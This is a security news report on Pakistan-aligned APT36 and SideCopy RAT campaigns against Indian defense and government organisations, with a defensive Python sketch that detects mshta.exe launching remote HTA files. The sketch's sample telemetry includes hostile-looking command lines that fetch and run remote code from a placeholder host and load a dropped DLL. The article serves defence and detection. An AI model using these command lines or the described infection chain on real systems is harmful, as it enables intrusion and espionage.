APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Entities

Security Reporter

Pakistan-aligned threat clusters APT36 and SideCopy are targeting Indian defense and government organizations with sophisticated cross-platform RAT campaigns using Geta RAT, Ares RAT, and DeskRAT malware.

Pakistan-aligned threat clusters APT36 and SideCopy have launched sophisticated cross-platform remote access trojan (RAT) campaigns targeting Indian defense sector organizations and government-aligned entities, according to recent cybersecurity research.

These campaigns demonstrate an evolution in espionage tactics, with threat actors expanding their capabilities beyond traditional Windows environments to include Linux systems. The attacks employ multiple malware families including Geta RAT, Ares RAT, and DeskRAT, all designed to provide persistent remote access, enable system reconnaissance, collect sensitive data, execute commands, and facilitate long-term post-compromise operations.

Campaign Origins and Attribution

APT36, also known as Transparent Tribe, and SideCopy are assessed to operate as Pakistan-aligned threat clusters. SideCopy has been active since at least 2019 and is considered a subdivision of Transparent Tribe. These groups have demonstrated consistent targeting of Indian defense, government, and strategic sectors over several years.

"Taken together, these campaigns reinforce a familiar but evolving narrative," said Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka. "Transparent Tribe and SideCopy are not reinventing espionage – they are refining it."

Attack Methodology

Initial Access Vectors

The campaigns begin with phishing emails containing malicious attachments or embedded download links that direct targets to attacker-controlled infrastructure. These initial access mechanisms serve as conduits for various malicious files:

  • Windows shortcuts (LNK files)
  • ELF binaries for Linux systems
  • PowerPoint Add-In files

Multi-Stage Infection Process

One documented attack chain involves a malicious LNK file that invokes "mshta.exe" to execute an HTML Application (HTA) file hosted on compromised legitimate domains. The HTA payload contains JavaScript that decrypts an embedded DLL payload, which then:

  1. Processes an embedded data blob to write a decoy PDF to disk
  2. Connects to a hard-coded command-and-control (C2) server
  3. Displays the saved decoy file to distract the victim

After displaying the lure document, the malware checks for installed security products and adapts its persistence method accordingly before deploying Geta RAT on the compromised host.

Malware Capabilities

Geta RAT

Geta RAT provides comprehensive capabilities including:

  • System information collection
  • Running process enumeration and termination
  • Installed applications listing
  • Credential harvesting
  • Clipboard content retrieval and replacement
  • Screenshot capture
  • File operations
  • Arbitrary shell command execution
  • USB device data harvesting

Ares RAT

A Linux variant employs a Go binary as a starting point to drop a Python-based Ares RAT through a shell script downloaded from an external server. Ares RAT offers similar capabilities to Geta RAT, including data harvesting and command execution.

DeskRAT

DeskRAT is delivered via rogue PowerPoint Add-In files that run embedded macros to establish outbound communication with remote servers. This malware was documented by Sekoia and QiAnXin XLab in October 2025 as part of APT36's toolkit.

Target Landscape

The attacks extend beyond traditional defense targets to include:

  • Policy organizations
  • Research institutions
  • Critical infrastructure
  • Defense-adjacent organizations
  • Government-aligned entities

"These campaigns demonstrate a well-resourced, espionage-focused threat actor deliberately targeting Indian defense, government, and strategic sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure," according to Aryaka's analysis.

Technical Sophistication

The campaigns showcase several advanced techniques:

  • Cross-platform coverage: Simultaneous targeting of Windows and Linux environments
  • Memory-resident techniques: Malware designed to operate below traditional detection thresholds
  • Decoy document deployment: Legitimate-looking PDFs used to distract victims during infection
  • Security product adaptation: Malware that detects and adapts to security software presence
  • Trusted infrastructure abuse: Use of compromised legitimate domains for C2 communications

Defensive Recommendations

Organizations in targeted sectors should implement the following measures:

  1. Enhanced email security: Deploy advanced phishing detection and sandboxing for attachments
  2. Multi-platform monitoring: Implement security solutions that cover both Windows and Linux environments
  3. User awareness training: Educate personnel about defense-themed phishing lures and document impersonation
  4. Network segmentation: Isolate critical systems from general user environments
  5. Regular patching: Maintain up-to-date systems to reduce exploitation opportunities
  6. Behavioral monitoring: Deploy solutions that detect anomalous process execution and network communications
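The behavioral-monitoring recommendation above maps directly onto the first stage of the documented infection chain: an LNK file that invokes mshta.exe to fetch an HTA from a hosted domain. The following Python is an added example written for this article, not code from the report or from any vendor product. It runs a two-part rule over constructed process-creation records (the field names follow Sysmon Event ID 1 conventions, an assumption; the hostnames, PIDs and the rundll32.exe hand-off are invented for illustration, since the article does not say which process the decrypted DLL is loaded through): flag mshta.exe started with a remote http(s) URL, and flag any process whose parent is mshta.exe, while leaving a locally installed HTA alone.

```python
"""Detection sketch for the LNK -> mshta.exe -> remote HTA stage.

All telemetry below is constructed for this example. Field names assume a
Sysmon Event ID 1 style export; nothing here is taken from the campaign.
"""
import re
from urllib.parse import urlparse

# Constructed sample telemetry: one record per process creation.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 1032, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\wininit.exe", "cmdline": "explorer.exe"},
    # Suspicious: mshta.exe launched (via a shortcut) with a hosted HTA URL.
    {"pid": 5588, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe https://docs.example-hosting.invalid/brief/agenda.hta"},
    # Suspicious: a child of mshta.exe loading a dropped DLL (assumed hand-off,
    # not described in the article).
    {"pid": 5610, "ppid": 5588, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\stage.dll,Start"},
    # Benign: mshta.exe running a local HTA shipped with an installed application.
    {"pid": 6001, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup\ui.hta"'},
    {"pid": 6100, "ppid": 4120, "image": r"C:\Program Files\Vendor\app.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "app.exe"},
]

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_hta_launch(ev):
    """True when mshta.exe is started with an http(s) URL on its command line."""
    if _basename(ev["image"]) != "mshta.exe":
        return False
    return URL_RE.search(ev["cmdline"]) is not None


def detect(events):
    """Return (rule, pid, detail) findings over process-creation records.

    Rule 1 catches the remote-HTA launch itself and records the contacted
    host so it can be checked against known-good domains. Rule 2 catches
    anything mshta.exe goes on to spawn, which a hosted HTA should never do
    in normal administrative use.
    """
    findings = []
    for ev in events:
        if remote_hta_launch(ev):
            url = URL_RE.search(ev["cmdline"]).group(0)
            findings.append(("mshta_remote_hta", ev["pid"], urlparse(url).hostname))
        if _basename(ev["parent_image"]) == "mshta.exe":
            findings.append(("mshta_child_process", ev["pid"], _basename(ev["image"])))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid={pid} {detail}")
```

The host recorded by the first rule matters because the article notes the HTA files were hosted on compromised legitimate domains, so a reputation lookup alone will not clear the alert; the process lineage from the second rule is the more reliable signal.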

Attribution Context

The activity reinforces the persistent nature of Pakistan-aligned cyber espionage operations against Indian targets. These campaigns represent a continuation of long-standing geopolitical tensions manifesting in the cyber domain, with threat actors demonstrating increasing sophistication in their cross-platform capabilities and evasion techniques.

The use of multiple RAT families across different operating systems suggests a well-resourced operation with access to diverse malware development capabilities. The consistent targeting of defense and government sectors indicates strategic intelligence collection objectives rather than financially motivated cybercrime.

This campaign highlights the ongoing evolution of state-sponsored cyber espionage, where threat actors continuously refine their tactics while maintaining focus on strategic objectives. The cross-platform approach and use of legitimate infrastructure for malicious purposes demonstrate the sophisticated nature of modern cyber espionage operations targeting government and defense organizations.
